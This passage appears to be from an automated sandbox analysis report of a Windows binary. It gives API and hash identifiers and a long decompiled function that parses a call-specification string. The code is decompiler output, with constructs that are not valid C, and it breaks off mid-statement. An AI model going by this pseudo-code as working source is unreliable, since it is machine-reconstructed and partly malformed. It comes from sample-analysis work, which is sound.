                                                                                                                                                                                                                            • Snapshot File: hcaresult_7_2_400000_UNK_.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendChangeClientDataEmptyFindLockMetricsNotificationOpenSystemThreadTrackUnlock
                                                                                                                                                                                                                            • String ID: H7B${
                                                                                                                                                                                                                            • API String ID: 4154960007-2256286769
                                                                                                                                                                                                                            • Opcode ID: acb4607de909606c36dfaba2b406014313c5fa90e55702556e162a5684d31028
                                                                                                                                                                                                                            • Instruction ID: d0bbb34d81c2c7a38b5cdb5171fa906e4f4201ee6cbe22cb0b3272b57562556b
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: acb4607de909606c36dfaba2b406014313c5fa90e55702556e162a5684d31028
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: D8B137B0900608FFDF119FA0DD89AAE7B79FB08354F00417AFA45A61A0CB755E52DF68
                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                            C-Code - Quality: 95%
                                                                                                                                                                                                                            			E687E1BFF() {
                                                                                                                                                                                                                            				signed int _v8;
                                                                                                                                                                                                                            				signed int _v12;
                                                                                                                                                                                                                            				signed int _v16;
                                                                                                                                                                                                                            				signed int _v20;
                                                                                                                                                                                                                            				WCHAR* _v24;
                                                                                                                                                                                                                            				WCHAR* _v28;
                                                                                                                                                                                                                            				signed int _v32;
                                                                                                                                                                                                                            				signed int _v36;
                                                                                                                                                                                                                            				signed int _v40;
                                                                                                                                                                                                                            				signed int _v44;
                                                                                                                                                                                                                            				WCHAR* _v48;
                                                                                                                                                                                                                            				signed int _v52;
                                                                                                                                                                                                                            				void* _v56;
                                                                                                                                                                                                                            				intOrPtr _v60;
                                                                                                                                                                                                                            				WCHAR* _t208;
                                                                                                                                                                                                                            				signed int _t211;
                                                                                                                                                                                                                            				void* _t213;
                                                                                                                                                                                                                            				void* _t215;
                                                                                                                                                                                                                            				WCHAR* _t217;
                                                                                                                                                                                                                            				void* _t225;
                                                                                                                                                                                                                            				struct HINSTANCE__* _t226;
                                                                                                                                                                                                                            				struct HINSTANCE__* _t227;
                                                                                                                                                                                                                            				struct HINSTANCE__* _t229;
                                                                                                                                                                                                                            				signed short _t231;
                                                                                                                                                                                                                            				struct HINSTANCE__* _t234;
                                                                                                                                                                                                                            				struct HINSTANCE__* _t236;
                                                                                                                                                                                                                            				void* _t237;
                                                                                                                                                                                                                            				intOrPtr* _t238;
                                                                                                                                                                                                                            				void* _t249;
                                                                                                                                                                                                                            				signed char _t250;
                                                                                                                                                                                                                            				signed int _t251;
                                                                                                                                                                                                                            				struct HINSTANCE__* _t257;
                                                                                                                                                                                                                            				void* _t258;
                                                                                                                                                                                                                            				signed int _t260;
                                                                                                                                                                                                                            				signed int _t261;
                                                                                                                                                                                                                            				signed short* _t264;
                                                                                                                                                                                                                            				signed int _t269;
                                                                                                                                                                                                                            				signed int _t272;
                                                                                                                                                                                                                            				signed int _t274;
                                                                                                                                                                                                                            				void* _t277;
                                                                                                                                                                                                                            				void* _t281;
                                                                                                                                                                                                                            				struct HINSTANCE__* _t283;
                                                                                                                                                                                                                            				signed int _t286;
                                                                                                                                                                                                                            				void _t287;
                                                                                                                                                                                                                            				signed int _t288;
                                                                                                                                                                                                                            				signed int _t300;
                                                                                                                                                                                                                            				signed int _t301;
                                                                                                                                                                                                                            				signed short _t304;
                                                                                                                                                                                                                            				void* _t305;
                                                                                                                                                                                                                            				signed int _t309;
                                                                                                                                                                                                                            				signed int _t312;
                                                                                                                                                                                                                            				signed int _t315;
                                                                                                                                                                                                                            				signed int _t316;
                                                                                                                                                                                                                            				signed int _t317;
                                                                                                                                                                                                                            				signed short* _t321;
                                                                                                                                                                                                                            				WCHAR* _t322;
                                                                                                                                                                                                                            				WCHAR* _t324;
                                                                                                                                                                                                                            				WCHAR* _t325;
                                                                                                                                                                                                                            				struct HINSTANCE__* _t326;
                                                                                                                                                                                                                            				void* _t328;
                                                                                                                                                                                                                            				signed int _t331;
                                                                                                                                                                                                                            				void* _t332;
                                                                                                                                                                                                                            
                                                                                                                                                                                                                            				_t283 = 0;
                                                                                                                                                                                                                            				_v32 = 0;
                                                                                                                                                                                                                            				_v36 = 0;
                                                                                                                                                                                                                            				_v16 = 0;
                                                                                                                                                                                                                            				_v8 = 0;
                                                                                                                                                                                                                            				_v40 = 0;
                                                                                                                                                                                                                            				_t332 = 0;
                                                                                                                                                                                                                            				_v52 = 0;
                                                                                                                                                                                                                            				_v44 = 0;
                                                                                                                                                                                                                            				_t208 = E687E12BB();
                                                                                                                                                                                                                            				_v24 = _t208;
                                                                                                                                                                                                                            				_v28 = _t208;
                                                                                                                                                                                                                            				_v48 = E687E12BB();
                                                                                                                                                                                                                            				_t321 = E687E12E3();
                                                                                                                                                                                                                            				_v56 = _t321;
                                                                                                                                                                                                                            				_v12 = _t321;
                                                                                                                                                                                                                            				while(1) {
                                                                                                                                                                                                                            					_t211 = _v32;
                                                                                                                                                                                                                            					_v60 = _t211;
                                                                                                                                                                                                                            					if(_t211 != _t283 && _t332 == _t283) {
                                                                                                                                                                                                                            						break;
                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                            					_t286 =  *_t321 & 0x0000ffff;
                                                                                                                                                                                                                            					_t213 = _t286 - _t283;
                                                                                                                                                                                                                            					if(_t213 == 0) {
                                                                                                                                                                                                                            						_t37 =  &_v32;
                                                                                                                                                                                                                            						 *_t37 = _v32 | 0xffffffff;
                                                                                                                                                                                                                            						__eflags =  *_t37;
                                                                                                                                                                                                                            						L20:
                                                                                                                                                                                                                            						_t215 = _v60 - _t283;
                                                                                                                                                                                                                            						if(_t215 == 0) {
                                                                                                                                                                                                                            							__eflags = _t332 - _t283;
                                                                                                                                                                                                                            							 *_v28 = _t283;
                                                                                                                                                                                                                            							if(_t332 == _t283) {
                                                                                                                                                                                                                            								_t332 = GlobalAlloc(0x40, 0x1ca4);
                                                                                                                                                                                                                            								 *(_t332 + 0x1010) = _t283;
                                                                                                                                                                                                                            								 *(_t332 + 0x1014) = _t283;
                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                            							_t287 = _v36;
                                                                                                                                                                                                                            							_t47 = _t332 + 8; // 0x8
                                                                                                                                                                                                                            							_t217 = _t47;
                                                                                                                                                                                                                            							_t48 = _t332 + 0x808; // 0x808
                                                                                                                                                                                                                            							_t322 = _t48;
                                                                                                                                                                                                                            							 *_t332 = _t287;
                                                                                                                                                                                                                            							_t288 = _t287 - _t283;
                                                                                                                                                                                                                            							__eflags = _t288;
                                                                                                                                                                                                                            							 *_t217 = _t283;
                                                                                                                                                                                                                            							 *_t322 = _t283;
                                                                                                                                                                                                                            							 *(_t332 + 0x1008) = _t283;
                                                                                                                                                                                                                            							 *(_t332 + 0x100c) = _t283;
                                                                                                                                                                                                                            							 *(_t332 + 4) = _t283;
                                                                                                                                                                                                                            							if(_t288 == 0) {
                                                                                                                                                                                                                            								__eflags = _v28 - _v24;
                                                                                                                                                                                                                            								if(_v28 == _v24) {
                                                                                                                                                                                                                            									goto L42;
                                                                                                                                                                                                                            								}
                                                                                                                                                                                                                            								_t328 = 0;
                                                                                                                                                                                                                            								GlobalFree(_t332);
                                                                                                                                                                                                                            								_t332 = E687E13B1(_v24);
                                                                                                                                                                                                                            								__eflags = _t332 - _t283;
								if(_t332 == _t283) {
									goto L42;
								} else {
									goto L35;
								}
								while(1) {
									L35:
									_t249 =  *(_t332 + 0x1ca0);
									__eflags = _t249 - _t283;
									if(_t249 == _t283) {
										break;
									}
									_t328 = _t332;
									_t332 = _t249;
									__eflags = _t332 - _t283;
									if(_t332 != _t283) {
										continue;
									}
									break;
								}
								__eflags = _t328 - _t283;
								if(_t328 != _t283) {
									 *(_t328 + 0x1ca0) = _t283;
								}
								_t250 =  *(_t332 + 0x1010);
								__eflags = _t250 & 0x00000008;
								if((_t250 & 0x00000008) == 0) {
									_t251 = _t250 | 0x00000002;
									__eflags = _t251;
									 *(_t332 + 0x1010) = _t251;
								} else {
									_t332 = E687E162F(_t332);
									 *(_t332 + 0x1010) =  *(_t332 + 0x1010) & 0xfffffff5;
								}
								goto L42;
							} else {
								_t300 = _t288 - 1;
								__eflags = _t300;
								if(_t300 == 0) {
									L31:
									lstrcpyW(_t217, _v48);
									L32:
									lstrcpyW(_t322, _v24);
									goto L42;
								}
								_t301 = _t300 - 1;
								__eflags = _t301;
								if(_t301 == 0) {
									goto L32;
								}
								__eflags = _t301 != 1;
								if(_t301 != 1) {
									goto L42;
								}
								goto L31;
							}
						} else {
							if(_t215 == 1) {
								_t257 = _v16;
								if(_v40 == _t283) {
									_t257 = _t257 - 1;
								}
								 *(_t332 + 0x1014) = _t257;
							}
							L42:
							_v12 = _v12 + 2;
							_v28 = _v24;
							L59:
							if(_v32 != 0xffffffff) {
								_t321 = _v12;
								continue;
							}
							break;
						}
					}
					_t258 = _t213 - 0x23;
					if(_t258 == 0) {
						__eflags = _t321 - _v56;
						if(_t321 <= _v56) {
							L17:
							__eflags = _v44 - _t283;
							if(_v44 != _t283) {
								L43:
								_t260 = _v32 - _t283;
								__eflags = _t260;
								if(_t260 == 0) {
									_t261 = _t286;
									while(1) {
										__eflags = _t261 - 0x22;
										if(_t261 != 0x22) {
											break;
										}
										_t321 =  &(_t321[1]);
										__eflags = _v44 - _t283;
										_v12 = _t321;
										if(_v44 == _t283) {
											_v44 = 1;
											L162:
											_v28 =  &(_v28[0]);
											 *_v28 =  *_t321;
											L58:
											_t331 =  &(_t321[1]);
											__eflags = _t331;
											_v12 = _t331;
											goto L59;
										}
										_t261 =  *_t321 & 0x0000ffff;
										_v44 = _t283;
									}
									__eflags = _t261 - 0x2a;
									if(_t261 == 0x2a) {
										_v36 = 2;
										L57:
										_t321 = _v12;
										_v28 = _v24;
										_t283 = 0;
										__eflags = 0;
										goto L58;
									}
									__eflags = _t261 - 0x2d;
									if(_t261 == 0x2d) {
										L151:
										_t304 =  *_t321;
										__eflags = _t304 - 0x2d;
										if(_t304 != 0x2d) {
											L154:
											_t264 =  &(_t321[1]);
											__eflags =  *_t264 - 0x3a;
											if( *_t264 != 0x3a) {
												goto L162;
											}
											__eflags = _t304 - 0x2d;
											if(_t304 == 0x2d) {
												goto L162;
											}
											_v36 = 1;
											L157:
											_v12 = _t264;
											__eflags = _v28 - _v24;
											if(_v28 <= _v24) {
												 *_v48 = _t283;
											} else {
												 *_v28 = _t283;
												lstrcpyW(_v48, _v24);
											}
											goto L57;
										}
										_t264 =  &(_t321[1]);
										__eflags =  *_t264 - 0x3e;
										if( *_t264 != 0x3e) {
                                                                                                                                                                                                                            											goto L154;
                                                                                                                                                                                                                            										}
                                                                                                                                                                                                                            										_v36 = 3;
                                                                                                                                                                                                                            										goto L157;
                                                                                                                                                                                                                            									}
                                                                                                                                                                                                                            									__eflags = _t261 - 0x3a;
                                                                                                                                                                                                                            									if(_t261 != 0x3a) {
                                                                                                                                                                                                                            										goto L162;
                                                                                                                                                                                                                            									}
                                                                                                                                                                                                                            									goto L151;
                                                                                                                                                                                                                            								}
                                                                                                                                                                                                                            								_t269 = _t260 - 1;
                                                                                                                                                                                                                            								__eflags = _t269;
                                                                                                                                                                                                                            								if(_t269 == 0) {
                                                                                                                                                                                                                            									L80:
                                                                                                                                                                                                                            									_t305 = _t286 + 0xffffffde;
                                                                                                                                                                                                                            									__eflags = _t305 - 0x55;
                                                                                                                                                                                                                            									if(_t305 > 0x55) {
                                                                                                                                                                                                                            										goto L57;
                                                                                                                                                                                                                            									}
                                                                                                                                                                                                                            									switch( *((intOrPtr*)(( *(_t305 + 0x687e23e8) & 0x000000ff) * 4 +  &M687E235C))) {
                                                                                                                                                                                                                            										case 0:
                                                                                                                                                                                                                            											__ecx = _v24;
                                                                                                                                                                                                                            											__edi = _v12;
                                                                                                                                                                                                                            											while(1) {
                                                                                                                                                                                                                            												__edi = __edi + 1;
                                                                                                                                                                                                                            												__edi = __edi + 1;
                                                                                                                                                                                                                            												_v12 = __edi;
                                                                                                                                                                                                                            												__ax =  *__edi;
                                                                                                                                                                                                                            												__eflags = __ax - __dx;
                                                                                                                                                                                                                            												if(__ax != __dx) {
                                                                                                                                                                                                                            													goto L132;
                                                                                                                                                                                                                            												}
                                                                                                                                                                                                                            												L131:
                                                                                                                                                                                                                            												__eflags =  *((intOrPtr*)(__edi + 2)) - __dx;
                                                                                                                                                                                                                            												if( *((intOrPtr*)(__edi + 2)) != __dx) {
                                                                                                                                                                                                                            													L136:
                                                                                                                                                                                                                            													 *__ecx =  *__ecx & 0x00000000;
                                                                                                                                                                                                                            													__eax = E687E12CC(_v24);
                                                                                                                                                                                                                            													__ebx = __eax;
                                                                                                                                                                                                                            													goto L97;
                                                                                                                                                                                                                            												}
                                                                                                                                                                                                                            												L132:
                                                                                                                                                                                                                            												__eflags = __ax;
                                                                                                                                                                                                                            												if(__ax == 0) {
                                                                                                                                                                                                                            													goto L136;
                                                                                                                                                                                                                            												}
                                                                                                                                                                                                                            												__eflags = __ax - __dx;
                                                                                                                                                                                                                            												if(__ax == __dx) {
                                                                                                                                                                                                                            													__edi = __edi + 1;
                                                                                                                                                                                                                            													__edi = __edi + 1;
                                                                                                                                                                                                                            													__eflags = __edi;
                                                                                                                                                                                                                            												}
                                                                                                                                                                                                                            												__ax =  *__edi;
                                                                                                                                                                                                                            												 *__ecx =  *__edi;
                                                                                                                                                                                                                            												__ecx = __ecx + 1;
                                                                                                                                                                                                                            												__ecx = __ecx + 1;
                                                                                                                                                                                                                            												__edi = __edi + 1;
                                                                                                                                                                                                                            												__edi = __edi + 1;
                                                                                                                                                                                                                            												_v12 = __edi;
                                                                                                                                                                                                                            												__ax =  *__edi;
                                                                                                                                                                                                                            												__eflags = __ax - __dx;
                                                                                                                                                                                                                            												if(__ax != __dx) {
                                                                                                                                                                                                                            													goto L132;
                                                                                                                                                                                                                            												}
                                                                                                                                                                                                                            												goto L131;
                                                                                                                                                                                                                            											}
                                                                                                                                                                                                                            										case 1:
                                                                                                                                                                                                                            											_v8 = 1;
                                                                                                                                                                                                                            											goto L57;
                                                                                                                                                                                                                            										case 2:
                                                                                                                                                                                                                            											_v8 = _v8 | 0xffffffff;
                                                                                                                                                                                                                            											goto L57;
                                                                                                                                                                                                                            										case 3:
                                                                                                                                                                                                                            											_v8 = _v8 & 0x00000000;
                                                                                                                                                                                                                            											_v20 = _v20 & 0x00000000;
                                                                                                                                                                                                                            											_v16 = _v16 + 1;
                                                                                                                                                                                                                            											goto L85;
                                                                                                                                                                                                                            										case 4:
                                                                                                                                                                                                                            											__eflags = _v20;
                                                                                                                                                                                                                            											if(_v20 != 0) {
                                                                                                                                                                                                                            												goto L57;
                                                                                                                                                                                                                            											}
                                                                                                                                                                                                                            											_v12 = _v12 - 2;
                                                                                                                                                                                                                            											__ebx = E687E12BB();
                                                                                                                                                                                                                            											 &_v12 = E687E1B86( &_v12);
                                                                                                                                                                                                                            											__eax = E687E1510(__edx, __eax, __edx, __ebx);
                                                                                                                                                                                                                            											goto L97;
                                                                                                                                                                                                                            										case 5:
                                                                                                                                                                                                                            											L105:
                                                                                                                                                                                                                            											_v20 = _v20 + 1;
                                                                                                                                                                                                                            											goto L57;
                                                                                                                                                                                                                            										case 6:
                                                                                                                                                                                                                            											_push(7);
                                                                                                                                                                                                                            											goto L123;
                                                                                                                                                                                                                            										case 7:
                                                                                                                                                                                                                            											_push(0x19);
                                                                                                                                                                                                                            											goto L143;
                                                                                                                                                                                                                            										case 8:
                                                                                                                                                                                                                            											__eax = 0;
                                                                                                                                                                                                                            											__eax = 1;
                                                                                                                                                                                                                            											__eflags = 1;
                                                                                                                                                                                                                            											goto L107;
                                                                                                                                                                                                                            										case 9:
                                                                                                                                                                                                                            											_push(0x15);
                                                                                                                                                                                                                            											goto L143;
                                                                                                                                                                                                                            										case 0xa:
                                                                                                                                                                                                                            											_push(0x16);
                                                                                                                                                                                                                            											goto L143;
                                                                                                                                                                                                                            										case 0xb:
                                                                                                                                                                                                                            											_push(0x18);
                                                                                                                                                                                                                            											goto L143;
                                                                                                                                                                                                                            										case 0xc:
                                                                                                                                                                                                                            											__eax = 0;
                                                                                                                                                                                                                            											__eax = 1;
                                                                                                                                                                                                                            											__eflags = 1;
                                                                                                                                                                                                                            											goto L118;
                                                                                                                                                                                                                            										case 0xd:
                                                                                                                                                                                                                            											__eax = 0;
                                                                                                                                                                                                                            											__eax = 1;
                                                                                                                                                                                                                            											__eflags = 1;
                                                                                                                                                                                                                            											goto L109;
                                                                                                                                                                                                                            										case 0xe:
                                                                                                                                                                                                                            											__eax = 0;
                                                                                                                                                                                                                            											__eax = 1;
                                                                                                                                                                                                                            											__eflags = 1;
                                                                                                                                                                                                                            											goto L111;
                                                                                                                                                                                                                            										case 0xf:
                                                                                                                                                                                                                            											__eax = 0;
                                                                                                                                                                                                                            											__eax = 1;
                                                                                                                                                                                                                            											__eflags = 1;
                                                                                                                                                                                                                            											goto L122;
                                                                                                                                                                                                                            										case 0x10:
                                                                                                                                                                                                                            											__eax = 0;
                                                                                                                                                                                                                            											__eax = 1;
                                                                                                                                                                                                                            											__eflags = 1;
                                                                                                                                                                                                                            											goto L113;
                                                                                                                                                                                                                            										case 0x11:
                                                                                                                                                                                                                            											_push(3);
                                                                                                                                                                                                                            											goto L123;
                                                                                                                                                                                                                            										case 0x12:
                                                                                                                                                                                                                            											_push(0x17);
                                                                                                                                                                                                                            											L143:
                                                                                                                                                                                                                            											_pop(__ebx);
                                                                                                                                                                                                                            											goto L98;
                                                                                                                                                                                                                            										case 0x13:
                                                                                                                                                                                                                            											__eax =  &_v12;
                                                                                                                                                                                                                            											__eax = E687E1B86( &_v12);
                                                                                                                                                                                                                            											__ebx = __eax;
                                                                                                                                                                                                                            											__ebx = __eax + 1;
                                                                                                                                                                                                                            											__eflags = __ebx - 0xb;
                                                                                                                                                                                                                            											if(__ebx < 0xb) {
                                                                                                                                                                                                                            												__ebx = __ebx + 0xa;
                                                                                                                                                                                                                            											}
                                                                                                                                                                                                                            											goto L97;
                                                                                                                                                                                                                            										case 0x14:
                                                                                                                                                                                                                            											__ebx = 0xffffffff;
                                                                                                                                                                                                                            											goto L98;
                                                                                                                                                                                                                            										case 0x15:
                                                                                                                                                                                                                            											__eax = 0;
                                                                                                                                                                                                                            											__eax = 1;
                                                                                                                                                                                                                            											__eflags = 1;
                                                                                                                                                                                                                            											goto L116;
                                                                                                                                                                                                                            										case 0x16:
                                                                                                                                                                                                                            											__ecx = 0;
                                                                                                                                                                                                                            											__eflags = 0;
                                                                                                                                                                                                                            											goto L91;
                                                                                                                                                                                                                            										case 0x17:
                                                                                                                                                                                                                            											__eax = 0;
                                                                                                                                                                                                                            											__eax = 1;
                                                                                                                                                                                                                            											__eflags = 1;
                                                                                                                                                                                                                            											goto L120;
                                                                                                                                                                                                                            										case 0x18:
                                                                                                                                                                                                                            											_t271 =  *(_t332 + 0x1014);
                                                                                                                                                                                                                            											__eflags = _t271 - _v16;
                                                                                                                                                                                                                            											if(_t271 > _v16) {
                                                                                                                                                                                                                            												_v16 = _t271;
                                                                                                                                                                                                                            											}
                                                                                                                                                                                                                            											_v8 = _v8 & 0x00000000;
                                                                                                                                                                                                                            											_v20 = _v20 & 0x00000000;
                                                                                                                                                                                                                            											_v36 - 3 = _t271 - (_v36 == 3);
                                                                                                                                                                                                                            											if(_t271 != _v36 == 3) {
                                                                                                                                                                                                                            												L85:
                                                                                                                                                                                                                            												_v40 = 1;
                                                                                                                                                                                                                            											}
                                                                                                                                                                                                                            											goto L57;
                                                                                                                                                                                                                            										case 0x19:
                                                                                                                                                                                                                            											L107:
                                                                                                                                                                                                                            											__ecx = 0;
                                                                                                                                                                                                                            											_v8 = 2;
                                                                                                                                                                                                                            											__ecx = 1;
                                                                                                                                                                                                                            											goto L91;
                                                                                                                                                                                                                            										case 0x1a:
                                                                                                                                                                                                                            											L118:
                                                                                                                                                                                                                            											_push(5);
                                                                                                                                                                                                                            											goto L123;
                                                                                                                                                                                                                            										case 0x1b:
                                                                                                                                                                                                                            											L109:
                                                                                                                                                                                                                            											__ecx = 0;
                                                                                                                                                                                                                            											_v8 = 3;
                                                                                                                                                                                                                            											__ecx = 1;
                                                                                                                                                                                                                            											goto L91;
                                                                                                                                                                                                                            										case 0x1c:
                                                                                                                                                                                                                            											L111:
                                                                                                                                                                                                                            											__ecx = 0;
                                                                                                                                                                                                                            											__ecx = 1;
                                                                                                                                                                                                                            											goto L91;
                                                                                                                                                                                                                            										case 0x1d:
                                                                                                                                                                                                                            											L122:
                                                                                                                                                                                                                            											_push(6);
                                                                                                                                                                                                                            											goto L123;
                                                                                                                                                                                                                            										case 0x1e:
                                                                                                                                                                                                                            											L113:
                                                                                                                                                                                                                            											_push(2);
                                                                                                                                                                                                                            											goto L123;
                                                                                                                                                                                                                            										case 0x1f:
                                                                                                                                                                                                                            											__eax =  &_v12;
                                                                                                                                                                                                                            											__eax = E687E1B86( &_v12);
                                                                                                                                                                                                                            											__ebx = __eax;
                                                                                                                                                                                                                            											__ebx = __eax + 1;
                                                                                                                                                                                                                            											goto L97;
                                                                                                                                                                                                                            										case 0x20:
                                                                                                                                                                                                                            											L116:
                                                                                                                                                                                                                            											_v52 = _v52 + 1;
                                                                                                                                                                                                                            											_push(4);
                                                                                                                                                                                                                            											_pop(__ecx);
                                                                                                                                                                                                                            											goto L91;
                                                                                                                                                                                                                            										case 0x21:
                                                                                                                                                                                                                            											L120:
                                                                                                                                                                                                                            											_push(4);
                                                                                                                                                                                                                            											L123:
                                                                                                                                                                                                                            											_pop(__ecx);
                                                                                                                                                                                                                            											L91:
                                                                                                                                                                                                                            											__edi = _v16;
                                                                                                                                                                                                                            											__edx =  *(0x687e405c + __ecx * 4);
                                                                                                                                                                                                                            											__eax =  ~__eax;
                                                                                                                                                                                                                            											asm("sbb eax, eax");
                                                                                                                                                                                                                            											_v40 = 1;
                                                                                                                                                                                                                            											__edi = _v16 << 5;
                                                                                                                                                                                                                            											__eax = __eax & 0x00008000;
                                                                                                                                                                                                                            											__edi = (_v16 << 5) + __esi;
                                                                                                                                                                                                                            											__eax = __eax | __ecx;
                                                                                                                                                                                                                            											__eflags = _v8;
                                                                                                                                                                                                                            											 *(__edi + 0x1018) = __eax;
                                                                                                                                                                                                                            											if(_v8 < 0) {
                                                                                                                                                                                                                            												L93:
                                                                                                                                                                                                                            												__edx = 0;
                                                                                                                                                                                                                            												__edx = 1;
                                                                                                                                                                                                                            												__eflags = 1;
                                                                                                                                                                                                                            												L94:
                                                                                                                                                                                                                            												__eflags = _v8 - 1;
                                                                                                                                                                                                                            												 *(__edi + 0x1028) = __edx;
                                                                                                                                                                                                                            												if(_v8 == 1) {
                                                                                                                                                                                                                            													__eax =  &_v12;
                                                                                                                                                                                                                            													__eax = E687E1B86( &_v12);
                                                                                                                                                                                                                            													__eax = __eax + 1;
                                                                                                                                                                                                                            													__eflags = __eax;
                                                                                                                                                                                                                            													_v8 = __eax;
                                                                                                                                                                                                                            												}
                                                                                                                                                                                                                            												__eax = _v8;
                                                                                                                                                                                                                            												 *((intOrPtr*)(__edi + 0x101c)) = _v8;
                                                                                                                                                                                                                            												_t136 = _v16 + 0x81; // 0x81
                                                                                                                                                                                                                            												_t136 = _t136 << 5;
                                                                                                                                                                                                                            												__eax = 0;
                                                                                                                                                                                                                            												__eflags = 0;
                                                                                                                                                                                                                            												 *((intOrPtr*)((_t136 << 5) + __esi)) = 0;
                                                                                                                                                                                                                            												 *((intOrPtr*)(__edi + 0x1030)) = 0;
                                                                                                                                                                                                                            												 *((intOrPtr*)(__edi + 0x102c)) = 0;
                                                                                                                                                                                                                            												L97:
                                                                                                                                                                                                                            												__eflags = __ebx;
                                                                                                                                                                                                                            												if(__ebx == 0) {
                                                                                                                                                                                                                            													goto L57;
                                                                                                                                                                                                                            												}
                                                                                                                                                                                                                            												L98:
                                                                                                                                                                                                                            												__eflags = _v20;
                                                                                                                                                                                                                            												_v40 = 1;
                                                                                                                                                                                                                            												if(_v20 != 0) {
                                                                                                                                                                                                                            													L103:
                                                                                                                                                                                                                            													__eflags = _v20 - 1;
                                                                                                                                                                                                                            													if(_v20 == 1) {
                                                                                                                                                                                                                            														__eax = _v16;
                                                                                                                                                                                                                            														__eax = _v16 << 5;
                                                                                                                                                                                                                            														__eflags = __eax;
                                                                                                                                                                                                                            														 *(__eax + __esi + 0x102c) = __ebx;
                                                                                                                                                                                                                            													}
                                                                                                                                                                                                                            													goto L105;
                                                                                                                                                                                                                            												}
                                                                                                                                                                                                                            												_v16 = _v16 << 5;
                                                                                                                                                                                                                            												_t144 = __esi + 0x1030; // 0x1030
                                                                                                                                                                                                                            												__edi = (_v16 << 5) + _t144;
                                                                                                                                                                                                                            												__eax =  *__edi;
                                                                                                                                                                                                                            												__eflags = __eax - 0xffffffff;
                                                                                                                                                                                                                            												if(__eax <= 0xffffffff) {
                                                                                                                                                                                                                            													L101:
                                                                                                                                                                                                                            													__eax = GlobalFree(__eax);
                                                                                                                                                                                                                            													L102:
                                                                                                                                                                                                                            													 *__edi = __ebx;
                                                                                                                                                                                                                            													goto L103;
                                                                                                                                                                                                                            												}
                                                                                                                                                                                                                            												__eflags = __eax - 0x19;
                                                                                                                                                                                                                            												if(__eax <= 0x19) {
                                                                                                                                                                                                                            													goto L102;
                                                                                                                                                                                                                            												}
                                                                                                                                                                                                                            												goto L101;
                                                                                                                                                                                                                            											}
                                                                                                                                                                                                                            											__eflags = __edx;
                                                                                                                                                                                                                            											if(__edx > 0) {
                                                                                                                                                                                                                            												goto L94;
                                                                                                                                                                                                                            											}
                                                                                                                                                                                                                            											goto L93;
                                                                                                                                                                                                                            										case 0x22:
                                                                                                                                                                                                                            											goto L57;
                                                                                                                                                                                                                            									}
                                                                                                                                                                                                                            								}
                                                                                                                                                                                                                            								_t272 = _t269 - 1;
                                                                                                                                                                                                                            								__eflags = _t272;
                                                                                                                                                                                                                            								if(_t272 == 0) {
                                                                                                                                                                                                                            									_v16 = _t283;
                                                                                                                                                                                                                            									goto L80;
                                                                                                                                                                                                                            								}
                                                                                                                                                                                                                            								__eflags = _t272 != 1;
                                                                                                                                                                                                                            								if(_t272 != 1) {
                                                                                                                                                                                                                            									goto L162;
                                                                                                                                                                                                                            								}
                                                                                                                                                                                                                            								__eflags = _t286 - 0x6e;
                                                                                                                                                                                                                            								if(__eflags > 0) {
                                                                                                                                                                                                                            									_t309 = _t286 - 0x72;
                                                                                                                                                                                                                            									__eflags = _t309;
                                                                                                                                                                                                                            									if(_t309 == 0) {
                                                                                                                                                                                                                            										_push(4);
                                                                                                                                                                                                                            										L74:
                                                                                                                                                                                                                            										_pop(_t274);
                                                                                                                                                                                                                            										L75:
                                                                                                                                                                                                                            										__eflags = _v8 - 1;
                                                                                                                                                                                                                            										if(_v8 != 1) {
                                                                                                                                                                                                                            											_t96 = _t332 + 0x1010;
                                                                                                                                                                                                                            											 *_t96 =  *(_t332 + 0x1010) &  !_t274;
                                                                                                                                                                                                                            											__eflags =  *_t96;
                                                                                                                                                                                                                            										} else {
                                                                                                                                                                                                                            											 *(_t332 + 0x1010) =  *(_t332 + 0x1010) | _t274;
                                                                                                                                                                                                                            										}
                                                                                                                                                                                                                            										_v8 = 1;
                                                                                                                                                                                                                            										goto L57;
                                                                                                                                                                                                                            									}
                                                                                                                                                                                                                            									_t312 = _t309 - 1;
                                                                                                                                                                                                                            									__eflags = _t312;
                                                                                                                                                                                                                            									if(_t312 == 0) {
                                                                                                                                                                                                                            										_push(0x10);
                                                                                                                                                                                                                            										goto L74;
                                                                                                                                                                                                                            									}
                                                                                                                                                                                                                            									__eflags = _t312 != 0;
                                                                                                                                                                                                                            									if(_t312 != 0) {
                                                                                                                                                                                                                            										goto L57;
                                                                                                                                                                                                                            									}
                                                                                                                                                                                                                            									_push(0x40);
                                                                                                                                                                                                                            									goto L74;
                                                                                                                                                                                                                            								}
                                                                                                                                                                                                                            								if(__eflags == 0) {
                                                                                                                                                                                                                            									_push(8);
                                                                                                                                                                                                                            									goto L74;
                                                                                                                                                                                                                            								}
                                                                                                                                                                                                                            								_t315 = _t286 - 0x21;
                                                                                                                                                                                                                            								__eflags = _t315;
                                                                                                                                                                                                                            								if(_t315 == 0) {
                                                                                                                                                                                                                            									_v8 =  ~_v8;
                                                                                                                                                                                                                            									goto L57;
                                                                                                                                                                                                                            								}
                                                                                                                                                                                                                            								_t316 = _t315 - 0x11;
                                                                                                                                                                                                                            								__eflags = _t316;
                                                                                                                                                                                                                            								if(_t316 == 0) {
                                                                                                                                                                                                                            									_t274 = 0x100;
                                                                                                                                                                                                                            									goto L75;
                                                                                                                                                                                                                            								}
                                                                                                                                                                                                                            								_t317 = _t316 - 0x31;
                                                                                                                                                                                                                            								__eflags = _t317;
                                                                                                                                                                                                                            								if(_t317 == 0) {
                                                                                                                                                                                                                            									_t274 = 1;
                                                                                                                                                                                                                            									goto L75;
                                                                                                                                                                                                                            								}
                                                                                                                                                                                                                            								__eflags = _t317 != 0;
                                                                                                                                                                                                                            								if(_t317 != 0) {
                                                                                                                                                                                                                            									goto L57;
                                                                                                                                                                                                                            								}
                                                                                                                                                                                                                            								_push(0x20);
                                                                                                                                                                                                                            								goto L74;
                                                                                                                                                                                                                            							} else {
                                                                                                                                                                                                                            								_v32 = _t283;
                                                                                                                                                                                                                            								_v36 = _t283;
                                                                                                                                                                                                                            								goto L20;
                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                            						__eflags =  *((short*)(_t321 - 2)) - 0x3a;
